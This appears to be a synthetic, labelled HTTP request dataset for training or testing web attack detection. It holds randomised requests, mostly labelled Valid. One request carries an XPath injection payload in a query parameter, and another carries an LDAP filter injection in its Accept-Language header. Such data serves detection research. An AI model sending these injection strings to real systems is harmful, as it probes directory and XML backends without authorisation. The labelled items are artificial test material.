Accept-Charset: iso-8859-7;q=0.8, us-ascii, big5, koi8;q=0.1
Accept-Encoding: compress;q=0.6
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 50.79.47.144
Cookie: dptiteeeep=886;robee=4dB;rte=gonph-ohttpslocationu]tf
Cookie2: $Version="01"
Date: Sun, 02 Sep 07 18:15:04 CET
ETag: W/"hJPD8bgYheR0d14VFiMI"
Expect: 100-continue
From: Sgspznl@eul4hW.net
If-Modified-Since: Sun, 07 May 06 19:51:24 GMT
If-Unmodified-Since: Thu, 30 Jul 09 16:59:05 CET
If-Match: "2KDLKhGgXEQyXHYgDn_C"
If-None-Match: *
If-Range: Mon, 25 Jan 10 18:58:22 GMT
Max-Forwards: 9
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic YXRkdHRoczpuZWFuZQ==
Range: -9,903164-,-40
Referer: http://sy1lps.fr/Dfihoeo/rEa3sm/iaxrOrz5/t3etth.php4
TE: chunked;q=0.0,trailers,gzip
Trailer: Date
User-Agent: Mozilla/5.4 (Windows; U; Win 9x 6.5; Ue-ct; rv:4.8.1) Gecko/38083455
UA-CPU: StrongARM
UA-Disp: 227,815,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4066x2541
Via: 6.7 8.125.212.13, HTTP/1.2 www.aOauatfr.gif, 6.1 www.Tliioo2.css
Transfer-Encoding: gl9i; trirImc=rxf7b
Upgrade: zcoos/4.4, u1ik/1.2
Warning: 407 www.yCMon.gif "snhRTtstehedo" 
X-Forwarded-For: 150.85.0.128
X-Serial-Number: 3885571205
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16433
Start - Id: 49391
class: XPathInjection
GET /6faHo39-CP_jm_M3/mbwBrtxbPyRDfwSPgYz/eZAN@VlDx/traFh/tx4dVJR7.8yfR@SHF-b.mspx?5sh1=+eouyud%40&uhagldis=668593&nerrorswooi=paflt1BQtTL4&EphpTN1D=%28i+++++%3C++++count%28neCrrh%2Fchild%3A%3Atext%28%29%29+and++j++++%3C+count%28Ldof%2Fchild%3A%3Acomment%28%29%29+and++k++%3C++++count%28lUwx%2Fchild%3A%3A*%29++%29&Ttsy8to0=heieEpr5aC&6qSy=+wnxp_letori7Mi&yuEhI=lpi+sjvoa7&fuo4ahNi8ts=dct&link0XXe3RaOMservices=slk&ual1aIuu1schaik=17760&olasztkps=b0+cyd1t%26&E2stkwtreuieaat=c5e+atmpdrateDses&GTT0asGu4D9KD=%26eu%27r4 HTTP/1.0
Host: 212.44.49.185:80
Connection: wE98nt
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 232.182.22.65
Cookie: aylxyMNlE=ehurugc
Cookie2: $Version="1"
Date: Thu, 05 Jan 06 10:44:53 CET
ETag: W/"2TMjTj3nMjRhbDH037L"
Expect: Mt3seamr
From: otnE6rt@cbsnLanere.cz
If-Modified-Since: Fri, 14 Jul 06 16:04:38 UTC
If-Unmodified-Since: Thu, 06 Sep 07 05:40:42 UTC
If-Match: *
If-None-Match: "0YIz3Z3nVOXfQdX1rECo"
If-Range: Sat, 12 Dec 09 19:17:27 UTC
Max-Forwards: 4
MIME-Version: 6.2
Pragma: aera='mW'
Proxy-Authorization: gWoe no1msa3=apmn
Authorization: NTLM dW9scG1od29zb2VpYW5FbnJqdGYxbkk0OGJldnNpcGlo
Range: 67912-847396,-254666,29-
Referer: http://www.goseetn.com/nubi/wPft/eE7ei/ehn7dea.js
TE: trailers,trailers,chunked;q=0.3
Trailer: If-Range
User-Agent: sn3t (mRPzC8qC; eiWiS@m; inetUdV; tW7Isbb)
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0695x2392
Via: HTTP/3.8 88.191.115.14, FTP/2.6 221.244.170.230, rZj/2.1 www.w4ece0h.shtml
Transfer-Encoding: gzip
Upgrade: goiteB/8.3
Warning: 873 179.220.247.176 "a53nepbizi" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 9327975536472
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49391
Start - Id: 5766
class: Valid
POST /eS5ryQm7xdU@ZKZ@/fotvCOLB8tEgVnwTH/FFMZcZzPincludeR2k/s4d/stasriabpRimnioCeqUm/7K9a/fSreYB9LAW/CkDcjdqnc2Jchildf/BaioitPenEw02sSCeds/snsgcrSm1Plh/0SsVGwhSqD_/hiztwlhiiWfk8c.mdb? HTTP/1.0
Content-Length: 178
Content-Language: mobaaoR,oedeht,tIEriolt
Content-Encoding: identity
Content-Location: http://enth.org/eaermo.pl
Content-MD5: b2E1c2VuYXRodWNoaWNuTg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 May 07 21:17:02 CET
Last-Modified: Sun, 27 Feb 05 24:04:07 CET
Host: 168.218.191.48
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.7, cp-932, shift_jis;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 1.90.96.252
Cookie: imgli-etc6K4=601
Cookie2: $Version="7"
Date: Mon, 08 Dec 08 02:07:27 CET
ETag: "VQuLsoA96NUbIKpr"
Expect: 100-continue
From: S9717u6@qqahmm.cz
If-Modified-Since: Thu, 16 Jun 05 07:20:35 UTC
If-Unmodified-Since: Fri, 06 Jan 06 21:24:02 GMT
If-Match: "aKSJ4B1T6xLRXY3yQ"
If-None-Match: "OrfB3pQETJbv5kdX"
If-Range: *
Max-Forwards: 013
MIME-Version: 3.5
Pragma: nahi='t1r'
Proxy-Authorization: Digest nc=ccb557Ff
Authorization: Digest algorithm=MD5
Range: 627-,94191-11363
Referer: /rSwA/s0ree/QrDod.fgf
TE: trailers,gzip;q=0.1
Trailer: From
User-Agent: Mozilla/6.9 (compatible; uzeg; Solaris; 4jmtet6eni)
UA-CPU: 68000
UA-Disp: 6915,168,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2088x8163
Via: 5.1 www.sa2ate0.htm, HTTP/2.2 www.a9cgsfju.html
Transfer-Encoding: identity
Upgrade: snbi/3.7, glmEeo/6.6, e8eA/3.9, rtg/0.0, ntx/4.7
Warning: 490 www.Rlrqmzrt.tiff:4521 "npcdrnbmyb8ae" 
X-Forwarded-For: 37.13.252.62
X-Serial-Number: 4042931462564768
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8I1rne=aRreIeezSeaniafp&ed=qa5pehktavzsoa0ie&tiy9kdfzotmn=l1ATNEoeqY1&4e8lNal=382802316&i3uHrjL=cyyTRuDX7g&tedrdi5e1=crEosel&vioeaaqrdnau2rd=% mdnc&ehaAhtYkiume=a1cD2&oteea=971

End - Id: 5766
Start - Id: 21742
class: Valid
GET /l3gi1u/kWNcJ/2O/sXw2dXeKN5/rEFMELDt@ltmTqQD/nao8gvtiQsietgwpoa.shtml?ylalo3x=7eueIzhsxlgdsa&uoaa7ui=hkym&B4MCH9=3TF8rL3I4vR&mYtat0yr0s0tu3O=936&eidotth=a4n+a&iaiiaI=2619&divEBVq=3ti&access_logr_xg=is3enetcat&5jMGU=sCai&s3=%7CooEn3&eaiqN7wsr9se4=aUth.&keidjefq=ms HTTP/1.0
Host: 59.74.238.72:80
Connection: close
Accept: application/*;q=0.9, audio/x-wav;q=0.8, video/mpeg
Accept-Charset: utf-8;q=0.4
Accept-Encoding: compress, deflate
Accept-Language: uhn-s5rpn0, ma-th, heetosq-oser, goErxlhn-oOh7, hapi-mcYor;q=0.8
Cache-Control: no-store
Client-ip: 148.34.177.195
Cookie: tG7c_%uFYx=pahsbin+le+;2hsw=wg;exceoootti=oio%2B;RrpP36i0=ai
Cookie2: $Version="2"
Date: Wed, 22 Oct 08 09:43:33 UTC
ETag: W/"q4pnhI1NSQfSL9Pc4w-P"
Expect: 100-continue
From: at2de@7dsrmtpw.fr
If-Modified-Since: Sat, 02 May 09 01:28:17 CET
If-Unmodified-Since: Mon, 16 Jan 06 11:39:24 UTC
If-Match: "WUQsPLU2p6eIKlu3"
If-None-Match: *
If-Range: "yLu5VjMWyYKVEWzmiF"
Max-Forwards: 1
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: 0k9Twe twle=ds1o3ar
Authorization: 3aN8e i17e6e=l3uoy0e
Range: 0-
Referer: http://dsoff.it/teaar/iwtn/utc1h.png
TE: trailers
Trailer: Trailer
User-Agent: 0m4mnok4ralsu6ldwita
UA-CPU: PowerPC
UA-Disp: 6826,0757,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 632x3686
Via: 4.3 www.neinnB.jpeg:00, 2.2 230.162.55.241, 4.5 www.hwrantk.htm
Transfer-Encoding: compress
Upgrade: eaw0U/0.9, r5loeg/6.1
Warning: 765 215.219.205.19:25695 "heeythtssiieDoGdrnm" 
X-Forwarded-For: 98.250.132.6
X-Serial-Number: 21815
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21742
Start - Id: 10403
class: Valid
GET /rmLiosoeeLivs5xbix/e0tse68s0zaS/eQ0xu8pRdZ25PaX/5B9ZH8HK8-c8Ge9t086/aJSed6g@/5rbHr/iO9itav/deG@_hRPJDK_uDB/8gDidsKTBZA/.L1Fprocessing-instruction4/4BjadminG.css?E3kvbscriptLGAXIYRQ=36316351&enYmos3enyT=l&wdnrrxiw3=4i%28eo2sHTrteuh5s&uiao44troevs=72&tnn9deeU3he=e0Z7WP8&wo=nqhi0sna&gaxs5fbh=2934548147 HTTP/1.0
Host: www.wIelIl.biz
Connection: keep-alive
Accept: video/*;q=0.1
Accept-Charset: windows-874, isiri-3342;q=0.1, windows-1253, x-mac-arabic;q=0.4
Accept-Encoding: identity;q=0.9, gzip
Accept-Language: *
Cache-Control: i0thva='eilte'
Client-ip: 208.80.138.55
Cookie: styleAbids7C=5472;nmsrEsedntu=passwdeg Ai ;brl0meeyte6=oh4kbyo;SIlezcnraeai=1453066444;dq=01719
Cookie2: $Version="5"
Date: Wed, 11 Jan 06 05:23:44 UTC
ETag: "GfcGhNtO9Dp@cKZXz@J"
Expect: oanN
From: orBxod@ooRislo1t.st
If-Modified-Since: Tue, 08 Jul 08 19:01:29 GMT
If-Unmodified-Since: Thu, 26 Jun 08 22:18:57 CET
If-Match: "8qQ@G-Hxn@j.2KEI"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: 2tht ejer=oT7xhiau
Authorization: NTLM YWVyaXRhYWhhaWIyZWVlcGVpcm9pcm9ndGUyZEc2dDllZTRyYXNqZWVl
Range: 5-355295,61313-1,05930-37268
Referer: /eie7gjui/emxb5/nnceA/sEN0p/rs1le.exe
TE: chunked
Trailer: Accept
User-Agent: Mozilla/9.5 (X11; U; Open BSD i386 7.0; rb-sn; rv:9.6.7) Gecko/63393719
UA-CPU: MIPS
UA-Disp: 063,647,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 552x911
Via: 9.8 212.124.24.213, 1.1 211.17.243.75
Transfer-Encoding: identity
Upgrade: eso/3.5, ddji/0.2, bfcnj/3.8, ofsuw6/8.7
Warning: 317 www.nwo2aaL.html "hrhexamatrte3elRbtn" 
X-Forwarded-For: 248.234.188.76
X-Serial-Number: 664473
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 10403
Start - Id: 1494
class: Valid
GET /ht/obaeAEazbstojsRsfw/uO.UX5jO@Pq2/qeehrsnndara/ennoxLZ4sseaoemilrI/2zLjNvBWM4L7minput/behro/dEZJDTmvkEvldQoItuX/tei/a4meezselaockapaeeb/5Wl028V.mspx?a8xhPeleebwwf=wJ-zAvU&sKnesurvlb=libaeTt+rVdselect4s+d&1intodp=hUKgR8iyR&aetunczSittt9a=+dlim642i%2420aandOho%5Cr7&ae=0lhp&hh=4750464&eis2sgevm=39 HTTP/1.0
Host: 197.13.223.72
Connection: bhre
Accept: application/*
Accept-Charset: iso-2022-jp;q=0.8, x-mac-chinesetrad;q=0.2
Accept-Encoding: 
Accept-Language: ur-s;q=0.9, tHtmt-qhurf
Cache-Control: max-stale
Client-ip: 237.35.75.90
Cookie: dytc=encpmbnzYGC;AkmetatdNESLN=h
Cookie2: $Version="024"
Date: Fri, 05 Mar 04 17:45:03 GMT
ETag: "2hpiJIqnZpGoazCQc8"
Expect: icwdgeae=v0ow
From: 5zeI8@rhKaeemAo.st
If-Modified-Since: Sun, 26 Apr 09 11:45:46 UTC
If-Unmodified-Since: Wed, 10 Nov 04 21:39:25 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 57
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM c2V4bTc0c2Q4Y2czRWRoaG9pZGV0cGRyOWs4c2Rjc3RhdGVvbWl0NA==
Authorization: iega zmft5c=asc4
Range: 7448-
Referer: http://2ehha.uk/dsief/uAqyew/tdrneit/hnhzx/esohinr.php3
TE: trailers,trailers
Trailer: User-Agent
User-Agent: bvw2W4 http://www.HaRoL3Cd.st
UA-CPU: MIPS
UA-Disp: 7926,709,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1994x755
Via: 7.8 205.244.15.107
Transfer-Encoding: i0ot0
Upgrade: S6gk/9.9, Aoe/4.0
Warning: 397 www.hrewoe.tiff "adPeaio" "Thu, 04 Sep 08 08:58:04 CET"
X-Forwarded-For: 234.233.233.38
X-Serial-Number: 894892
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1494
Start - Id: 32630
class: Valid
PUT /dmtoraioirin/nSitetcYFp/iZ6u_qQRyz0i/eoiIrpNmdelbif6anb/DEeo-8wBp/iAcuGIJDad/8R-0RU3FIZ3DW2Fo9/smAomhxodo8s/anzlext1t/o_lKwps6RkAst_zn/srsataf.asmx? HTTP/1.1
Content-Length: 39
Content-Language: ktt,arrry,drtm3li
Content-Encoding: compress
Content-Location: /f5id/rtscrage/pdE7tm/hKnOhah.jpeg
Content-MD5: dGVzVHRsYW83dGEyUklhRA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 26 Aug 07 07:16:34 UTC
Last-Modified: Sun, 24 Jan 10 05:41:29 GMT
Host: 45.197.210.197:28
Connection: udcge
Accept: */*;q=0.4
Accept-Charset: iso-8859-5;q=0.7, x-mac-icelandic, iso-8859-8;q=0.3
Accept-Encoding: deflate, gzip;q=0.1, deflate;q=0.9, deflate;q=0.1
Accept-Language: *
Cache-Control: no-cache
Client-ip: 83.101.124.16
Cookie: eonDi=katiyem
Cookie2: $Version="4"
Date: Wed, 05 Aug 09 02:37:51 UTC
ETag: "tuTKFO_V-QSedDOKO_Pm"
Expect: 100-continue
From: thueneui@iqeto5ti.org
If-Modified-Since: Mon, 21 Aug 06 07:42:42 GMT
If-Unmodified-Since: Sun, 07 Jan 07 24:35:58 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 265
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest nc=8Ce14fAB
Authorization: 0see essaspIN=sotldhm
Range: 0-468
Referer: http://www.stmy1t6e.be/sgtu.cgi
TE: deflate;q=0.0,deflate,chunked;q=0.4
Trailer: Max-Forwards
User-Agent: oQEfG8e.j http://www.reooovlb.net
UA-CPU: PowerPC
UA-Disp: 530,9577,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 853x924
Via: 3.3 152.86.156.169, weoy/6.8 www.6eoa.js
Transfer-Encoding: gzip
Upgrade: ynt1h/8.2, ngs7ii/4.5, emia/0.6, hboy/6.2
Warning: 659 180.178.216.93 "eswsYtuMme" 
X-Forwarded-For: 118.148.230.191
X-Serial-Number: 4855309378866511170
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

dc6coixnlmtoih=uf3BjwF4wn&TYZTexec=eheo

End - Id: 32630
Start - Id: 25167
class: Valid
GET /eogRf/winntm-/auWUOd5Hz1oj/ll3nh/ehxm13aoIylakdin/bXxwCcJBPxcHF/%uJ@8ldWW4FgQs/cn8aYONvMwJKX/vsdlnomeeEo/CdeleteDoX-varyC5Cc.tiff?Wtostdin0etck6openX5=neots&ehrdenphotsalo=ie6openfroml&hr=26&BWb1xHZ9a=8161&VnullBVP8=1ERG&ael1=5&5lEh=a%2Fcmdbotu6nI%40ol3BuEi&rN=7097567089 HTTP/1.1
Host: 85.255.194.140
Connection: keep-alive
Accept: audio/basic;q=0.6, image/png
Accept-Charset: iso-8859-6, windows-1250;q=0.6, windows-1253;q=0.6, iso-8859-9, hz-gb-2312
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 3.143.186.155
Cookie: PocpassthruSWI@-e=emnidcedeaqweijoe;1npofure=443807677;hetsam6=Ieeval;eeienZ=7
Cookie2: $Version="99"
Date: Fri, 02 Dec 05 03:20:22 GMT
ETag: W/"H5UmMh.r4DbgYRT@Gvo3"
Expect: nk4eb9=seppiis
From: t6e6@olsywdnTj.it
If-Modified-Since: Thu, 27 Aug 09 22:20:55 UTC
If-Unmodified-Since: Mon, 23 Feb 04 17:24:07 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 10 Oct 05 11:30:28 UTC
Max-Forwards: 9
MIME-Version: 9.1
Pragma: odw='issfee'
Proxy-Authorization: NTLM eHVjMWU5b2lodGVzdG9Jd1R6Zm9kbW5paGgyck9hRTc=
Authorization: aetier 41ettep=qtihlcs
Range: 0550-
Referer: http://bInzuhn.cz/me7i/kSieiso/ljsce/of1eW/nsyse.jpeg
TE: trailers,trailers,trailers
Trailer: Expect
User-Agent: lxWuyiGr4 http://www.9fayroC.cz
UA-CPU: Sparc
UA-Disp: 550,936,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5457x802
Via: valdrs/0.4 www.y9sddfr2.tiff:0, 5.5 www.tUSeyI.png:3, 6.9 163.95.1.208:1
Transfer-Encoding: identity
Upgrade: sjLelq/8.2, rste/6.1, o6qi4e/2.3
Warning: 814 www.tanns.gif "7et8naWmlnMpa" 
X-Forwarded-For: 54.93.72.103
X-Serial-Number: 39906730696975900354
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25167
Start - Id: 36869
class: LdapInjection
GET /NJR9VOAL9libMFNG.nsf?eedrngep=1vbscriptr&gahodltgeb=nrateeir&epirtthrxae6Hst=471&eels8ratTn=ohttpss569cpysa5ik&group bySservicesYGb=stygroup+byreplace&ts0l2=376&ahrsg9t5Zr=480&Kw3pWD0h=%24TsystemoronreplaceTtdryyn%29rehsu&iEnodedxhavingSadmin=Lit0t1t8a&anoCytefai=u%3C99wh+ni&alttlnosoreeet=078&FpaT9K3o=+nq%40oadrc&t9dn6oAeeggatfp=iutde%3ATthttntwsexecxmlL HTTP/1.0
Host: www.hhhehae.org:16151
Connection: close
Accept: */*
Accept-Charset: utf-8, macintosh, x-mac-japanese
Accept-Encoding: identity;q=0.0, identity;q=0.5, compress, deflate;q=0.2
Accept-Language: 3008)(&(objectClass=airt)(|(sn  = eti)(cn=f   J*))
Cache-Control: max-stale=44711
Client-ip: 123.220.245.255
Cookie: _Hs7systemG-F=qsmdjIHq8-18;nftdi8tbe6oteho=85956;JZ4ps2TvTcNW=droaaeautG
Cookie2: $Version="63"
Date: Tue, 05 Apr 05 02:02:38 UTC
ETag: "ae2zvBsicONvSGZhzi"
If-Modified-Since: Tue, 20 Sep 05 13:52:30 CET
If-Unmodified-Since: Thu, 17 Apr 08 17:48:56 GMT
If-Match: *
Max-Forwards: 2307
Authorization: Basic dHNnYjp6U3Vl
Referer: /aahenutU.cfm
Trailer: Authorization
User-Agent: II6tEeteat9sNtil
Via: FTP/8.0 222.201.233.87:0, ieh/9.6 149.251.200.12, FTP/8.2 www.vrCte.gif
Transfer-Encoding: gzip
X-Serial-Number: 2930060025936921704

null

End - Id: 36869
Start - Id: 22089
class: Valid
GET /df-lrq/g_6SRdmuAMF/aMQ55tgXKeYll7ZkS/ldttnnerebEHton0tmh/roOxyGwVXC0NGTK7O6V/m@T1/rdEFrcpoon7Xiykur/FG.O/v7v/hC4wZ/a7_Jdu3NSY9x.html?bihei=eQBrmm&rcideweibeSbsud=7569556702&nroigc=55&HBTnsei=iqpasswdpositionscfle&lrodpn0cadpnR=hs&yeehgzTlo9pD5c=6632797&ebzzb=-4orsH2&gxoceTinh=bdO2E%40evaln3f+u%27%3Ase%40not&nw2tn6ltmors=e&jiirttUse=Erq%3Aadmin HTTP/1.1
Host: www.Opntnfsr.uk:84243
Connection: close
Accept: */*;q=0.1
Accept-Charset: koi8-r, macintosh;q=0.2, iso-8859-2;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 96.215.51.114
Cookie: stwtqcs=SroaohtzGrin4;aha7heissc=31643;rtkaepanotrtni=2279091;4tncalthmbedn=emcenzhOrgzo\;SscriptdeleteeW=thkupYfng6@;hySwa=29
Cookie2: $Version="55"
Date: Sat, 10 Nov 07 23:44:18 CET
ETag: W/"SanrXoCzHmw5UWujzl_o"
Expect: 100-continue
From: ueqe@unebe7ja.ch
If-Modified-Since: Sun, 09 Sep 07 15:06:03 UTC
If-Unmodified-Since: Thu, 03 Aug 06 08:53:51 UTC
If-Match: *
If-None-Match: "L.d0alPEdurZA.sDhU"
If-Range: Tue, 13 Sep 05 11:18:35 UTC
Max-Forwards: 954
MIME-Version: 1.8
Pragma: axscd=4dva
Proxy-Authorization: NTLM b2VMemlwc2hIMndzdGM1dGRlZWFIMTV1ZG85OGxlZm9yaQ==
Authorization: NTLM ZWVzdWF0aHJuZWdBZG93ZWVhbENpZGVpYXRmaWNldWdyZQ==
Range: -63,8739-,76572-
Referer: /Ahoth.txt
TE: deflate,trailers
Trailer: If-Modified-Since
User-Agent: 92ht3hp
UA-CPU: StrongARM
UA-Disp: 7235,8490,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8724x0388
Via: 5.3 167.32.211.49
Transfer-Encoding: deflate
Upgrade: ireEu/5.5
Warning: 503 www.atcO.png "aniinsIheewgiof" 
X-Forwarded-For: 223.155.250.69
X-Serial-Number: 42920569636252963929
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 22089
Start - Id: 29582
class: Valid
GET /3W7mtHNpbY.be/Q6kIcdDgOecSG/ZU/Ago6ibShnifUeiCmticu/rrtnniWc/i_TfSZOV5wut/AwtnsehonfeesUbofr/sE8O5qoX3Y2S0Cc/e.5krQ360pzKTUQi/eZdnZGM3vAsb.gif?fotyr1iqS=9&im=etitft0eiReweiYdsq&_4d2FbfP2KZ=iti4re7rsegoep8e&1iPgaqi=tintcoopene5galteeamehr&aeat=eBQdJgr&snhn1n=gu3a0dc0&QkEV-_Qkf9=EL0hlnaw&LttoOrta=xahdrxlyemattlkra&1czeihtpdg=RrsmaOy7bl8ou&tteltvweneieess=ze6aeoeotf&canrtifYtS=jcsa HTTP/1.1
Host: www.detieotge.uk
Connection: close
Accept: */*
Accept-Charset: windows-1258;q=0.9, iso-2022-jp;q=0.8
Accept-Encoding: 
Accept-Language: twp4o-ohTnezx
Cache-Control: no-transform
Client-ip: 100.140.145.133
Cookie: mteceTet=4;tfinpt=tfU;9NltGnecrgloA=tic g;betweenZqU5DZsV=088
Cookie2: $Version="6"
Date: Tue, 26 Dec 06 21:24:16 UTC
ETag: "1WYlWphnw6vMC-PjkoZ"
Expect: Umiwbt
From: d1em@0njeio.be
If-Modified-Since: Thu, 02 Sep 04 05:59:45 UTC
If-Unmodified-Since: Tue, 09 Feb 10 17:01:08 CET
If-Match: "_diIQnrfXAKX5R99enS"
If-None-Match: *
If-Range: *
Max-Forwards: 93
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM OEExbjJIdHVzcjlzNDhlbHVwbWpjd3A4OXRwRTlkaXI=
Authorization: esfhoa oix3w=unlhpat
Range: 9372-
Referer: /onehl/a4bh9/spte.bin
TE: gzip,chunked
Trailer: Trailer
User-Agent: Mozilla/9.9 (Windows; U; WinNT 5.5; ad-e7; rv:3.7.9) Gecko/55695170
UA-CPU: 68000
UA-Disp: 872,513,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3909x9569
Via: n9a/3.0 67.107.132.176, 0.6 www.4ohN.html, FTP/3.6 24.132.179.53:31251
Transfer-Encoding: deflate
Upgrade: 36yuhe/7.5, orrXnN/3.1, piil/2.2, er2iuu/0.7
Warning: 104 www.hlxEi9.htm:081 "oayabextiat9eH" "Mon, 21 Jan 08 17:09:27 CET"
X-Forwarded-For: 41.83.226.161
X-Serial-Number: 755614
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29582
Start - Id: 5613
class: Valid
POST /trGUterNwfeneme6nase/bnoe/hqUsVgFbn3/Seu07/ejj9/o8aceO9h/3s87s5iahxseebtWya/_FSDr-BU0wqX..jsp? HTTP/1.1
Content-Length: 110
Content-Language: bqawe,Rrere,sife
Content-Encoding: identity
Content-Location: /alnieQ/kt40/r5anp.jsp
Content-MD5: bG5NYXZwbk9mTmdybnVyOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Mar 07 07:26:16 GMT
Last-Modified: Tue, 29 Dec 09 07:19:13 CET
Host: www.drnruitsr.it:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: pare-7eh1giqo
Cache-Control: only-if-cached
Client-ip: 193.158.164.119
Cookie: emws=[stdinpjjesecbshi@qqS;ea=i0a0hs;eie6drzjz=0700;Ta9raehedmjt=1
Cookie2: $Version="028"
Date: Tue, 03 Oct 06 16:51:52 GMT
ETag: W/"FztXqOn-c.s_8zz3AipC"
Expect: 100-continue
From: retom@4teeztn0w.uk
If-Modified-Since: Fri, 10 Feb 06 17:51:30 GMT
If-Unmodified-Since: Sun, 10 Aug 08 11:04:21 CET
If-Match: *
If-None-Match: "8Y818s8AzT6u0K2"
If-Range: *
Max-Forwards: 5
MIME-Version: 1.8
Pragma: inmJ5t=eNfoh
Proxy-Authorization: NTLM aWVmZWpnYWlnbW9kZXJlZE55YTJmRVQ5ZVRFc2VlaHRhZXk=
Authorization: NTLM cnJyRXNuc3V0dGN0amhyNmFvVGp0cGFvZmc1dG9rb2hlUW1uZ2g=
Range: 67795-,06619-,662301-47622
Referer: http://moasa.be/heeeeio.rar
TE: gzip
Trailer: If-Modified-Since
User-Agent: Omk1eos (smp3q8)
UA-CPU: StrongARM
UA-Disp: 6817,0716,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0202x3743
Via: 7.1 www.phnr.tiff, FTP/5.2 148.110.111.47, etepec/2.5 www.endmhIia.js
Transfer-Encoding: ltjhe
Upgrade: uv6jTt/2.4
Warning: 803 145.78.232.247 "ihmqhTtecao" "Wed, 20 Aug 08 01:29:34 GMT"
X-Forwarded-For: 253.42.32.113
X-Serial-Number: 7014694
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

erlhlNeaSoxi=ea s&206b=sQNAfrYk4&feoSei=tnah&cB7iet0euc=oya7sfd&7rpechou=ot&ovedtf=74221677&0NaorkaoesjeTr=785

End - Id: 5613
Start - Id: 6256
class: Valid
PUT /oodar/abvXp6CR/tiieqVyicEeredseyizs/DFKbDYGtmpE/Z0K6JDuuo/-Esadmin9hlib3Xy6HoKu/XoD/nw0SS72nieK1a0Pt/gtt.shtml? HTTP/1.1
Content-Length: 92
Content-Language: somgsbo
Content-Encoding: compress
Content-Location: http://dutgo3iW.uk/oripd.sh
Content-MD5: ZVNodHJ6aThlWTN5dWVzYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 May 09 23:22:15 CET
Last-Modified: Wed, 11 Oct 06 22:13:34 CET
Host: www.kTnmnpiten.biz
Connection: keep-alive
Accept: text/plain
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: zr7fn9x='E2naheAo'
Client-ip: 157.21.100.224
Cookie: aoinskett=u8mesurDT;otmtrpnee=ievegtyiqtvhMeaee;bttd4xhitfqin=a8ite(te3;ay2n=itsd
Cookie2: $Version="47"
Date: Wed, 20 May 09 11:03:03 GMT
ETag: W/"lOSQGp7vOsjCtnp"
Expect: 100-continue
From: Deit2tin@frt4se8ha.be
If-Modified-Since: Sat, 29 Dec 07 04:08:38 GMT
If-Unmodified-Since: Sat, 21 Jan 06 19:42:35 UTC
If-Match: *
If-None-Match: "l2Waajwz8ustjxhWyKbF"
If-Range: "38WOfpIo_UE@WT6-s0"
Max-Forwards: 0
MIME-Version: 1.5
Pragma: Ti=7d8AmnpM
Proxy-Authorization: NTLM emF3aWQ4ajNyd2FySXRtb3RzY2VPdGllaWNpYWFlemhvZjllcnBs
Authorization: 7fnwt eatlI=evAengaa
Range: 3-853722,-06527
Referer: http://neiqbocs.net/lehw6ct.exe
TE: trailers,deflate;q=0.9
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.1 (X11; U; Open BSD i386 5.6; xo-Ee; rv:7.9.7) Gecko/19377458
UA-CPU: MIPS
UA-Disp: 9466,026,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0276x3141
Via: HTTP/9.9 www.mEarHiqa.htm, HTTP/0.5 72.93.56.239, FTP/8.2 www.ht0pbaa.html
Transfer-Encoding: deflate
